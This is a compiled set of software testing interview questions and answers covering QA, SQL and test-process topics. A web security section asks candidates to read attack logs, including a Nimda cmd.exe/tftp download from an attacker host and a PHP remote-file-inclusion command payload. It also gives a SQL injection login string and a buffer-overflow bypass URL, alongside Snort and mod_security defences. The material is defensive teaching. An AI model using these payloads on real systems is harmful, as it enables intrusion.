testing interview question(qa)
DESCRIPTION
testing interview Question(QA)TRANSCRIPT
Database Testing questions asked by Interviewer @IGATE
Below are the few database testing questions which have been asked by interviewer when I’ve attended the IGATE walk-in Drive.
Company: Patni Computer System ( Now it’s iGATE)
Interview Type: Walk-in Drive
Date : 18th September 2010, Saturday
What is Database testing & What we normally check for in the Database Testing? How to Test database in Manually? Explain with an example. What is data driven test? How to check a trigger is fired or not, while doing database testing? How to Test Database Procedures and Triggers? Is a “A fast database retrieval rate” a testable requirement? What SQL statements have you used in Database Testing? What are different Joins, Give example of each. Can you delete a parent table record if there is a child table record exits? How ? What is Referential Integrity. What is RowID How to know the database version How to execute SQL script in Query window How to create temporary variable How to print an Environment variable What is meant by Database user, how it is different from Login
Knowledge Work Book – Interview Question Bank(QA)
Company: Cybage Software [An SEI-CMMI Level 5 assessed & V1.3 Company] www.cybage.com
Interview Type: Walk-in/Referral walk-in
Date: 11th August 2012
Venue: CT1, Kalyaninagar, PUNE
Rakesh Hansalia (QA, Cybage, Gandhinagar ) http://www.linkedin.com/in/rakeshhansaliaBelow are the questions which were asked to the candidates in the walk-in interview for QA position:
1) Describe yourself?
2) Describe your current project?
3) Which is the android latest version?
4) What is the difference between Android 2.1 and Android 2.2?
5) Oops concepts.
6) Difference between a class and a interface.
7) Different version control.
8) SQL queries?
9) Do you have any idea of join in sql?
10) Test case format?
11) What are smoke, regression and functional testing?
12) Bug Life cycle?
13) What is equivalence partitioning?
14) How to identify an object in selenium and QTP?
15) How to display a message in Selenium?
16) Different views in QTP.
17) Different modes in QTP.
18) What is test automation framework?
19) What are different types of automation frameworks?
20) How you do security testing for an application?
21) What content you include in test status report?
22) How you have mentored your team? ( This question is applicable if you have written in your CV that you have mentored)
23) Have you prepared test plan? If yes, then what content you include in test plan?
24) Would you like to ask any questions from us?
25) Describe application certification testing.
26) How you do certification testing?
27) What role you are playing in your current company?
28) What are the differences and similarity between the mobile app which you are testing in your current project with the app if you tested it on windows?
29) Difference between System testing and Functional testing.
30) 3 most important test scenarios for a pen.
31) 3 least important test scenarios for a pen from user point of view.
32) Suppose 100 requirements are there, how will you estimate them?
33) Suppose 1000 tcs are there, will you run all 1000 tcs on all devices?
34) 3 assert commands.
35) Difference between Selenium Web driver, RC and IDE.
36) Rate yourself for automation.
37) What are the components of QTP?
38) Do you have knowledge of sql?
39) What is compatibility testing? Is compatibility testing functional or non functional?
40) What is non-functional testing?
41) Relate usability and reliability with your current project.
42) Suppose somebody is not comfortable with you in your team and he/she does not tell anybody what he/she feels but you know that your peer is not comfortable then what will you do?
43) If you have mentioned hobbies in your resume, then they can ask you questions related to your hobbies.
44) Do you have any questions which you want to ask?
45) What is root cause analysis?
46) 3 scenarios for which you as a tester can’t do root cause analysis or help developer to know the what is the reason for a bug?
47) write a c program to create a pattern :
1
2 2
3 3 3
48) What is stdio.h?
49) What is a library?
50) Tell me the names of 3 libraries.
51) Tell me the names of 5 automation tools for mobile.
52) Suppose you are the only resource and work is of 3 days and you have to complete it in 2 days, then what will you do?
53) Suppose you have to select device for an application which should work on latest as well as previous Android versions, then which device will you select?
54) What is polymorphism?
Interview Questions @ Polaris
a. Interview Date:29-05-2010b. Company Name: Polarisc. Location:Hyderabad
I faced following questions in Polaris Interview.
1. Tell me about u r current organization2. what is Black box testing?3. what is white box testing?4. What is Functional Testing?5. What is difference between Black box & functional testing?6. what is test plan?7. what is test strategy?
8. what is difference between Test plan & test strategy?9. What is smoke testing10 what is sanity testing?11. who will perform smoke testing?12. Explain about Agile process?13. How much you know about QTP? (I mentioned in my resume as Exposure on QTP)14. Explain about u r current project?15. What is the Requirement Traceability Matrix?16. Can u draw the template for Requirement Traceability Matrix?17. What is Ad-hoc Testing?18. What is difference between ReTesting and Regression Testing.19. Can u explain about Bug life cycle?20. How can u make sure whether all requirements are covered or not?21. Can u explain biggest complexity in current project?22. what is difference between bug severity and priority?23. Which bug tracking tool is u r using?24. can u give one example for High severity and low priority bug?25. can u give one example for High priority and low severity bug?26. What is security Testing?
ValueLabs (Hyderabad) Manual Testing – Written test Questions and Answers
ValueLabs (Hyderabad) Manual Testing – Written test Questions and Answers
Time: 90 Minutes ( 25 Questions)
Value Labs Manual Testing – Written test Questions and Answers- Prepared By_Rakesh Hansalia
1) What is Composite Primary Key.
A primary key can consist of one or more columns of a table. When two or more columns are used as a primary key, they are called a composite key. Each single column’s data can be duplicated but the combination values of these columns cannot be duplicated.
For example, if you have a Student table and a Course table, and one student can select many courses and one course can be selected by many students, so this is a many-to-many relationship. So you need to create the third table to define the relationship, say it’s called StudentCourse. It is important to note that you only need the StudentID and CourseID in this table as a composite key. You do not need an extra identity ID column in this table to uniquely identifies each row because only having an ID column to uniquely identifies each row is not sufficient. It cannot prevent the same student selecting the same course from being inserted into this table.
2) Difference between Table and View
Views are essentially logical table-like structures populated on the fly by a given query. The results of a view query are not stored anywhere on disk and the view is recreated every time the query is executed. Materialized views are actual structures stored within the database and written to disk. They are updated based on the parameters defined when they are created.
view uses a query to pull data from the underlying tables.
A materialized view is a table on disk that contains the result set of a query.
3) Difference between ECP and BVA
If I say in one line then ECP doesn’t include the boundary values in class partitions e.g. If we have three classes of 1-20, 21-40 and 41-60 then ECP we are not including the values 1,20,21,40,41 and 60 whereas in BVA we include them also.
4) Difference between Testing Scenario and Test Case
Test case is a condition which is executed for expected output with predefined set of steps with known inputs. Generally a test case have
1) Precondition2) Steps to execute3) Input data4) Expected output5) Status (Pass/Fail)
Test Scenario is set of test cases. What it means, If you have to withdraw money from an ATM machine, then it is a scenario. But to withdraw money, you need to execute many test cases, needs to provide many inputs and you get many outputs and finally your money with receipt of transaction.
Test Scenario is ‘What to be tested’ and Test Case is ‘How to be tested’.
5) Explain V -model
6) High Priority test cases for ATM application
1. Machine is accepting ATM card
2. Machine is rejecting expired card
3. successful entry of PIN number
4. unsuccessful operation due to enter wrong PIN number 3 times
5. successful selection of language
6. successful selection of account type
7. unsuccessful operation due to invalid account type
8. successful selection of amount to be withdraw
9. successful withdrawal.
10. Expected message due to amount is greater than day limit
11. unsuccessful withdraw operation due to lack of money in ATM
12. Expected message due to amount to withdraw is greater than possible balance.
13. unsuccessful withdraw operation due to click cancel after insert card
14. Check ATM machine is able to print receipts
15. Withdraw amount should be in the multiples of 100
7) Different DDL and DML commands
Data Definition Language (also known as DDL) is a computer language used to define data structures [ALTER COMMENT DROP CREATE]The most popular form of DML is the Structured Query Language (or SQL). This is a language used for databases, and is designed specifically for managing data in relational database management systems (or RDBMS) [UPDATE DELETE LOCK INSERT SELECT]
9) Is functional Testing and System testing Same?
I would say ..No it’s not same.
-System testing is nothing but testing of the application as whole,where as Functional testing is nothing but testing of the application functionality.
-System testing is one of the phases of testing in SDLC .
For Eg in typical V model in develeopement phase unit testing is performed, followed by integration test and when the software is ready it is deployed to QA environment to perform “system testing “.
System testing is end to end application testing.
Functional testing is the Type of testing. It means testing the various functionalities of the application (individual or integrated) Other type being Non functional.
In system testing phase both Functional and non functional testing is performed.
- Most people think Functional testing and System testing is same. But they differ slightly in that functional testing verifies a software by checking it against designed specification documents while system testing validates a software by checking it against the user requirements.
10) Bug live cycle states
Open Fixed Closed Reopen Obsolete
http://www.software-pointers.com/en-configuration-tools.html
11) Tell me 3 different Software Configuration Management Tools
http://www.software-pointers.com/en-configuration-tools.html
I’ve used VSS( Visual SourceSafe from Miscrosoft) & Tortoise when I was in iGATE patni, Gandhingar.
12) difference between Bug,error,defect
Bug : It is found in the development environment before the product is shipped to the respective customer.
Error : It is the Deviation from actual and the expected value.
Defect : It is found in the product itself after it is shipped to the respective customer.
13) What are the test deliverable in SDLC, when to deliver what doc?
Test cases DocumentsTest PlanTesting StrategyTest ScriptsTest DataTest Trace-ability MatrixTest Results/reportsTest summary report
Install/config guidesDefect ReportRelease notes
14) Tell me the concepts present in Test plan.
Refer this link : http://rakeshhansalia.wordpress.com/2012/05/14/test-plan-preparation-for-manual-testing/
15) What are the main issues found in Browser Comparability testing.
Alignment issues, JS errors, Image display problems, Ajax issue
16) bug life cycle
New Bug found > QA log a bug (Open State) > DEV Fix a big (Fixed State) > QA test it (Closed if ok or Reopen it if fails)
17)which is test case optimization method
1)BVA 2) functional testing 3) incremental testing 4) big band
Ans: BVA ( Boundary value Analysis
18) difference between the delete and truncate command
ü Delete and Truncate both are logged operation. But DELETE is a logged operation on a per row basis and TRUNCATE logs the de allocation of the data pages in which the data exists. You can’t rollback data in TRUNCATE but in DELETE you can rollback data. TRUNCATE removes(delete) the record permanently.
ü You cannot TRUNCATE a table that has any foreign keyconstraints. You will have to remove the constraints, TRUNCATE thetable, and reapply the constraints.
19) integration testing would done after system testing
a) true b) false
Ans: False
20) what is static method
There are two types of methods.
Instance methods are associated with an object and use the instance variables of that object. This is the default.
Static methods use no instance variables of any object of the class they are defined in. If you define a method to be static, you will be given a rude message by the compiler if you try to access any instance variables. You can access static variables, but except for constants, this is unusual. Static methods typically take all they data from parameters and compute something from those parameters, with no reference to variables. This is typical of methods which do some kind of generic calculation. A good example of this are the many utility methods in the predefined Math class.
Web Security Interview Questions Web Security Interview Questions
The goal of this document is to provide appropriate questions for HR/Managers to pose to individuals who are applying for web security related positions. These questions do not have right or wrong answers, but rather spark relevant conversation between the applicant and the hiring staff.
Entry Level Questions
1. 1. What do you see as the most critical and current threats effecting Internet accessible websites?
Goal of question – To gauge the applicant’s knowledge of current web related threats. Topics such as Denial of Service, Brute Force, Buffer Overflows, and Input Validation are all relevant topics. Hopefully they will mention information provided by web security organizations such as the Web Application Security Consortium (WASC) or the Open Web Application Security Project (OWASP).
2. What online resources do you use to keep abreast of web security issues? Can you give an example of a recent web security vulnerability or threat?
Goal of question – Determine if the applicant utilizes computer security resources such as CERT, SANS Internet Storm Center or ICAT. Email lists such as securityfocus, bugtraq, SANS @RISK, etc. are also good resources. Recent examples of threats will vary depending on current events, but issues such as new web based worms (PHP Santy Worm) or applications, which are in wide use (awstats scripts) are acceptable.
1. What do you see as challenges to successfully deploying/monitoring web intrusion detection?
Goal of question – We are attempting to see if the applicant has a wide knowledge of web security monitoring and IDS issues such as:
Limitations of NIDS for web monitoring (SSL, semantic issues with understanding HTTP) Proper logging – increasing the verboseness of logging (Mod_Security audit_log) Remote Centralized Logging Alerting Mechanisms Updating Signatures/Policies
1. What is your definition of the term “Cross-Site Scripting”? What is the potential impact to servers and clients?
Goal of question –This question will determine if the applicant is well versed in the terminology used in web security. The applicant needs to be able to articulate highly technological topics to a wide audience. The second question will help to verify that the applicant fully understands how XSS attacks work and the impact to client information. WASC has a web security glossary of terms that may be of help – http://www.webappsec.org/glossary.html
Cross-Site Scripting: (Acronym – XSS) An attack technique that forces a web site to echo client-supplied data, which execute in a user’s web browser. When a user is Cross-Site Scripted, the attacker will have access to all web browser content (cookies, history, application version, etc). XSS attacks do not typically directly target the web server or application, but are rather aimed at the client. The web server is merely used as a conduit for the XSS data to be presented to the end client. See also “Client-Side Scripting”.
1. What are the most important steps you would recommend for securing a new web server? Web application?
Goal of question – Once again, there is no right or wrong answer, however we are interested in what the applicant views as important.
Web Server Security:
Update/Patch the web server software Minimize the server functionality – disable extra modules Delete default data/scripts Increase logging verboseness Update Permissions/Ownership of files
Web Application Security:
Make sure Input Validation is enforced within the code – Security QA testing Configured to display generic error messages Implement a software security policy Remove or protect hidden files and directories
Advanced Level Questions
1. 1. Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry?
68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 – - [09/Mar/2004:22:23:48 -0500] “GET /c/winnt/system32/
cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0″ 200 566 “-” “-”
Goal of question – To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.
If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?
You could use either Microsoft’s Internet and Security Acceleration (ISA) server as a front-end proxy or implement URLScan on the target IIS server. The urlscan.ini file has the AllowDotInPath directive which will block directory traversal attempts.
1. 2. You are engaged in a penetration-test where you are attempting to gain access to a protected location. You are presented with this login screen:
What are some examples of you how you would attempt to gain access
Goal of question – Determine if the applicant has a wide knowledge of different authentication vulnerabilities. They may attempt default usernames/passwords or attempt SQL Injection queries that provide an SQL true statement (such as – ‘ OR 1=1#). If they provide SQL examples, then offer them the following Error document information and ask them what this indicates.
ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near ‘=’.
Data Source = “ECommerceTheArchSupport2″
SQL = “SELECT QuickJump_Items.ItemId FROM QuickJump_Items WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId =”
The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (1:1) to (1:42) in the template file K:\InetPub\clients\login\http\ailment.cfm
The specific sequence of files included or processed is:K:\INETPUB\CLIENTS\LOGIN\HTTP\AILMENT.CFM
This error message indicates that the target web application if running Microsoft SQL and discloses directory structures.
1. 3. What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?
========================================
Request: 200.158.8.207 – - [09/Oct/2004:19:40:46 --0400] “POST /index.php HTTP/1.1″ 403 743
Handler: cgi-script
—————————————-
POST /index.php HTTP/1.1
Host: http://www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match “uname\x20-a” at POST_PAYLOAD
mod_security-action: 403
65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a
Goal of question – to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion
vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the command. This attack was not successful for the following two reasons:
The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the “uname –a” data in the POST PAYLOAD.
The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon “;” between the ls and uname commands. The target host would fail to execute the “lsuname” command.
1. 4. One of your web servers is logging multiple requests similar to the following:
201.1.199.155 – - [26/Dec/2004:01:55:48 -0500] “PUT /hacked.htm HTTP/1.0” 403 769 “Microsoft Data Access Internet Publishing Provider DAV 1.1” “-“
What does this log entry indicate? How could you identify what the contents are of the “hacked.htm” file that the attacker is trying to upload?
Goal of question – Determine if the applicant can identify both the attack (a web defacement attempt using the HTTP PUT Method), as well as, the logging limitations of CLF. In this type of attack, the defacement text is sent in the request body and not on the URL Request line. In order to identify this data, a network sniffing application would need to be utilized. An application such as Snort could be used with a custom rule to identify this activity. Here is an example rule –
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:”LOCAL Put attempt”; flow:to_server,established; tag:session,50,packets; pcre:”/^PUT /A”; sid:3000001; rev:1;)
1. 5. You have been asked to review the source code for a compiled script that is being used to validate logon credentials for a web application. The file is called “logon_validate” and a typical logon request looks like this –
“GET /cgi-bin/logon_validate?login=test&password=test”
The source code is shown below –
void show_error(void) {
// AUTHENTICATION ERROR
exit(-1);
}
int main(int argc, char **argv) {
char error_on_auth=’1′;
char user[128];
char pass[128];
char *ch_ptr_begin;
char *ch_ptr_end;
/**********************************/
/* Get Username from Query String */
/**********************************/
ch_ptr_begin=(char *)strstr(****QUERY_STRING****,”login=”);
if (ch_ptr_begin==NULL)
show_error();
ch_ptr_begin+=6;
ch_ptr_end=(char *)strstr(ch_ptr_begin,”&”);
if (ch_ptr_end==NULL)
show_error();
*(ch_ptr_end++)=”;
strcpy(user,ch_ptr_begin);
/**********************************/
/* Get Password from Query String */
/**********************************/
ch_ptr_begin=(char *)strstr(ch_ptr_end,”password=”);
if (ch_ptr_begin==NULL)
show_error();
ch_ptr_begin+=9;
ch_ptr_end=(char *)strstr(ch_ptr_begin,”&”);
if (ch_ptr_end!=NULL) *(ch_ptr_end++)=”;
strcpy(pass,ch_ptr_begin);
if ((strcmp(user,GOOD_USER)==0) && (strcmp(pass,GOOD_PASS)==0))
error_on_auth=’0′;
if (error_on_auth==’0′) {
// AUTHENTICATION OK!!
} else {
// AUTHENTICATION ERROR
show_error();
}
// return(0); hehe could be evil ;PPPPP
exit(0);
}
This pseudo-code is taken from the NGSec Web Auth Games http://quiz.ngsec.biz:8080/game1/level6/replicant.php
Do you see any problems with this script? How could an attacker exploit this script to bypass the authentication mechanisms in this script? What are some mitigation options?
Goal of question – This is most likely the most complex question being asked during the interview due to the fact that the applicant will need to apply multiple layers of analysis, including both the attacker and defender perspectives.
Reference “Smashing The Stack For Fun And Profit” for technical details –
http://www.phrack.org/phrack/49/P49-14
The security issue with this script has to do with a buffer overflow problem in the way that the script is using the “error_on_auth” condition. The error_on_auth condition is initially declared to be “1” which means that he user is not authenticated. The “user” condition was declared directly after the error_on_auth and has been allocated 128 bytes. Due to the ordering of the declaration of the error_on_auth and user parameters, they occupy adjacent locations on the running stack. The result is that if the attacker submits a username that is 129 bytes (with the last byte being “0”), they can overwrite the error_on_auth data. A Unix command such as the following would achieve this goal –
http://www.companyx.com/cgi-bin/validate_logon?logon=000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
or
# wget http://www.companyx.com/cgi-bin/validate_logon?logon=`perl -e print "0"x129`
Mitigation options include the following:
Update the validate_logon soruce code to fix the problem, such as using strncpy() instead of strcpy ().
If the source code could not be updated, then security filters would need to be implemented on the web server.
Using Mod_Security, you could implement some security filters for the “validate_logon” URL such as these:
o Only allow letters in the username argument. This would prevent the client from overwriting the error_on_auth data with a zero.
<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN “!^[a-zA-Z]”
</Location>
o You could also add another rule to restrict the size of the username/password arguments to be less then 129 characters.
<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN “!^[a-zA-Z]”
SecFilterSelective ARG_LOGIN|ARG_PASSWORD “.{129,}”
</Location>
A web application firewall (WAF) device could be implemented on the network to protect the entire web site. These devices have positive policy capability that should identify these types of attacks as “anomalous” and deny them. A brief listing of WAF vendors include Teros, Netcontiuum, Imperva, Watchfire, Breach, Axiliance, and others.
Software Testing general Interview Questions
Q1. Different between error, bug, defect, fault, failure?
Error: Errors are basically the deviation from the requirement, caught by testers and caused by misunderstanding of the Developers. Other words u can say coding problem or problem caused due to wrong coding practice.
Bug: If the Error found by testers are accepted as error by Developers. Then the error will called Bug. Either it should be functional or load.
Defect: Suppose any product/software is currently running as a beta version in the market/client side. Any issue currently caught in that application that are deviating the actual result from the requirement, will take as Defect.
Fault: When the product/software successfully launched in the market and running properly but due to any reason if it works unexpectedly is called Fault.
Failure: If the product fails to full fill the requirement, then it is called Failure.
Q2. What is validation and verification?
Validation: Better known as testing and the process includes: System testing System Integration testing Sub System Integration testing. Unit testing. Black box testing will be used in the validate…
Verification:-conducting reviews on documents like BRS, SRS, HLDS, and LLDS……called as Verification Validation:-executing the test cases and observing whether actual result is equal to expected result…
Q3. Explain Software test lifecycle?
STLC basically contains of five stages : 1) Planning and control 2) Analysis and Design 3) Implementation and Execution 4) Evaluating Exit criteria and Reporting 5) Test Closure.
In other words u can also say that Requirement gathering, test design, test plan, and Bug reporting, regression testing and closer. And explain briefly each and every step.
Q4. Explain buglife cycle?
New, open, assigned, fixed reopen and closed.
New when tester raises the bug the status should be new.
Open if the bug is genuine the lead should change the status open
Assign Assign to the developer
Fixed Developer fixed the bug and changes the status as fixed.
Reopen after regression or retesting tester will decide bug is closed or reopen.
Closed fixed by developer and tester review and closed.
Q5. What is software Testing Methodologies?These are some of the commonly used test methodologies:1. Waterfall model2. V model3. Spiral model4. Rational Unified Process (RUP)5. Agile model6. Rapid Application Development (RAD)
Explain anyone which ur current company follows..
Q6. What is traceability matrix?
Traceability matrix is a document in which we map the test cases with the requirements. In general we check whether the application works as per requirements or whether we had covered all the required functionality through test cases.
Q7. What is performance testing?
Performance testing is the testing, which is performed, to ascertain how the components of a system are performing, given a particular situation. Resource usage, scalability and reliability of the product are also validated under this testing. This testing is the subset of performance engineering, which is focused on addressing performance issues in the design and architecture of software product.
Q8. Different kind of testing performed in mobile application testing?
Functional testing – This type of testing ignores the internal parts and focus on the output is as per requirement or not. Black-box type testing geared to functional requirements of an application.
System testing – Entire system is tested as per the requirements. Black-box type testing that is based on overall requirements specifications, covers all combined parts of a system.
Incremental integration testing – Bottom up approach for testing i.e continuous testing of an application as new functionality is added; Application functionality and modules should be independent enough to test separately. done by programmers or by testers.
End-to-end testing – Similar to system testing, involves testing of a complete application environment in a situation that mimics real-world use, such as interacting with a database, using network communications, or interacting with other hardware, applications, or systems if appropriate.
Acceptance testing -Normally this type of testing is done to verify if system meets the customer specified requirements. User or customer does this testing to determine whether to accept application.
Usability testing – User-friendliness check. Application flow is tested, Can new user understand the application easily, Proper help documented whenever user stuck at any point. Basically system navigation is checked in this testing.
Install/uninstall testing – Tested for full, partial, or upgrade install/uninstall processes on different operating systems under different hardware, software environment
Compatibility testing – Testing how well software performs in a particular hardware/software/operating system/network environment and different combination s of above.
Recovery testing – Testing how well a system recovers from crashes, hardware failures, or other catastrophic problems.
What is test plan?
A test plan can be defined as a document describing the scope, approach, resources, and schedule of intended testing activities.
It identifies test items, the features to be tested, the testing tasks, who will do each task, and any risks requiring contingency planning.
In other word u can say Test plan is a strategic document in order to do testing. it consists of test plan id, reference documents, Revision history, Test schedules, Test Item, Test process, Resources, Risks and mitigations, Training.. of info..
What is test case?
Test Cases are the implementation of a test case design which will help the software tester to detect defects in the application or the system being tested. This should be the primary goal of any test case or set of test cases. When I write a test case, I think of both types of test cases, positive test cases and negative test cases. Positive test cases are those which execute the happy path in the application and make sure that the happy path is working fine. Negative test cases as
the name suggests are destructive test cases which are documented with some out-of-box thinking to break the system.
In other word u can say a test case is a document that describes an input, action, or event and an expected response, to determine if a feature of an application is working correctly. A test case should contain particulars such as test case identifier, test case name, objective, test conditions/setup, input data requirements, steps, and expected results.
What is End-to-End testing?
Testing a complete application environment in a situation that mimics real-world use, such as interacting with a database, using network communications, or interacting with other hardware, applications, or systems if appropriate.
What is the difference between re-testing and regression testing?
Retesting: Testing the same test cases in same build with different inputs…
Regression Testing: Attempts to verify that the application work as specified even after the enhancements done/bug fixes made to it.
What is test coverage?
Test coverage measures in some specific way the amount of testing performed by a set of tests (derived in some other way, e.g. using specification-based techniques). Wherever we can count things and can tell whether or not each of those things has been tested by some test, then we can measure coverage.
1. What are our primary objectives for a tool?
2. Describe the organizations development and testing process / methodology.
3. What type(s) of testing are we doing currently?
4. What tools do we currently own / maintain? (Purchased and Homegrown)
5. What language(s) is our application developed in?
6. Is the application web or browser based? If so, which browsers and versions do we test on.
7. What operating systems do we test on?
8. Are there any third party controls or grids?
9. Are there any Active X controls?
10. Do we need to test server side com objects or other parts of our application not accessed by a GUI?
11. Describe the application architecture?
12. What is the communication protocol between the different tiers of the application?
13. What databases does our application work with?
14. How do we create our test data?
15. Are we trying to validate data in the GUI or the back end database or both?
16. How often does our group test new builds of applications?
17. Do we have a dedicated Test Lab or would testers be using their own desktops?
18. What amount of money are we budgeting for this project / tool?
Why I will hire u?
I think that I am best suitable for this job. I am an efficient team player when a team work is concerned and if I am supposed to complete a task in a particular time then I am able to work individually and effectively to meet the deadlines. I can deal with the things effectively under pressure. And also, I am optimistic, hardworking, self-motivated, detailed oriented, well organized person. So, these qualities make me suitable to this job.
How to write Basic Cover latter
Basic cover letter
This paragraph, mention the source of the job vacancy, introduce yourself to the potential employer, mention how you suit the job profile, and make the employer aware of the attached resume. An employer has to take a decision based on just one paragraph, whether you should be called for an interview or not. So, you need to be very careful while writing a basic cover letter.
Even though a basic cover letter needs to be short and precise, you should not skip any important details that are essential for an employer to know. If you sacrifice any important information for the sake of the format, you might sacrifice your chance of getting an interview call. So, always remember that though short, you should be precise and to the point while writing your basic cover letter.
Example of cover letter:
I am interested in the Test lead position advertised in XXXX. I am currently employed as sr. software test engineer in YYYY Company.
Write some roles and responsibilities of your current company in second paragraph
To further acquaint you with the specifics of my background I am enclosing my resume. I hope you will consider me for this position. I look forward to meeting with you and discussing my qualifications in more detail.
Sincerely,